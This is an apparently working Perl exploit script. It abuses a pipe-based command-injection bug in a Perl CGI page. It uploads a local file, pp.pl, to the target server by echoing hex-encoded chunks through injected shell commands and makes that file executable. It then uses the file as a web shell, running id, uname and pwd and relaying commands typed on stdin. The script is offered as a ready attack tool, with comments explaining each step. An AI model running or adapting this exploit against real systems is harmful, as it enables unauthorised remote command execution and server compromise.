#!/usr/bin/perl #oxagast # # __ _ _ __ ___ __ ____ ____ # / ( \/ )/ _\ / __)/ _\/ ___(_ _) # ( O ) (/ ( (_ / \___ \ )( # \__(_/\_\_/\_/\___\_/\_(____/(__) # use LWP::Simple; # Loads the downloading module from LWP use List::MoreUtils qw(natatime); # Loads the n at a time module from List MoreUtils $part1 = @ARGV[0];$part2 = @ARGV[1]; # Sucks up all the arguments $lfn = "./pp.pl"; $rfn = "pp.pl"; $baseurl = $part1; $baseurl =~ s/index.pl.*//; # get baseurl $stuff = get("$part1\|rm -f $rfn\|$part2"); # Uses the pipe bug to remove the file if it's there so we can put new data in $buff = ""; # Initializes buffer $string = ""; # Initializes string where buffer will put into open FILEHANDLE, "<", $lfn; # Open the local file handle for reading binmode FILEHANDLE; # Make sure we open in binary mode while(read (FILEHANDLE, $buff, 1)) { # Until the files over we read 1 character at a time into buffer and open loop $file .= $buff; # Stick it together into the string variable } # Close loop close FILEHANDLE; # Close the file because we are done reading it $unpacked = unpack("H*","$file"); # Turns the file contense into a hexadecimal string $ib = " "; # ib is a space, just for a placeholder $unpacked =~ s/(..)/$ib$1/g; # Globally search and replace putting a space between the hex $howmuch = 256; # How many chars to try to send at once @hexxy = split(" ", $unpacked); # Split with the space between the hex codes to put each hexadecimal code # into the list $it = natatime $howmuch, @hexxy; # Initialize n at a time, making the itterator put howmuch chars (in hex) # into the new buffer at a time while( my @hex = $it->()) { # Start the itterator and put it in the array called hex for $hexer (0..scalar(@hex)-1) { # For the itterator we have hexer as the count of 0 through 1 before the end of the hex list @hex[$hexer] =~ s/(..)/\\\\x$1/; # put two backslashes and an x before the hex $hexstring = join "", @hex; # Put however many howmany hex codes in the string in the above format for echo if ($hexstring =~ m/\\x..$/g) { # Since there is other crap in there, we have to get the last string in that # itteration that's in the right format at the end of the line # print "$hexstring"; # Print the hex codes it sent get("$part1\|echo -n -e $hexstring >> $rfn\|$part2"); # Use a long get request, part1 being everything before where we would normally put # a pipe for command execution, then the echo command telling it no new lines and to # use hexadecimal, finally the last part of the address is put in, and it sends the # get request, and in doing so, echos in all our hex data } # Closes loop } # Closes loop } # closes itterator get("$part1|chmod 0711 ./pp.pl|$part2"); # Change perms $idstr = get($baseurl . "pp.pl?cmd=id"); # id $unstr = get($baseurl . "pp.pl?cmd=uname -a"); # uname $cwd = get($baseurl . "pp.pl?cmd=pwd"); # get current dir chomp($idstr); # cut some stuff off the ends chomp($unstr); print $idstr . $unstr; #print id and uname -a chomp($cwd); chomp($cwd); while($comm = <STDIN>) { # get input print "$cwd \$ "; # fake $PS1 chomp($comm); $content = get($baseurl . "pp.pl?cmd=" . $comm); # get output chomp($content); print $content; # print it } # got shells?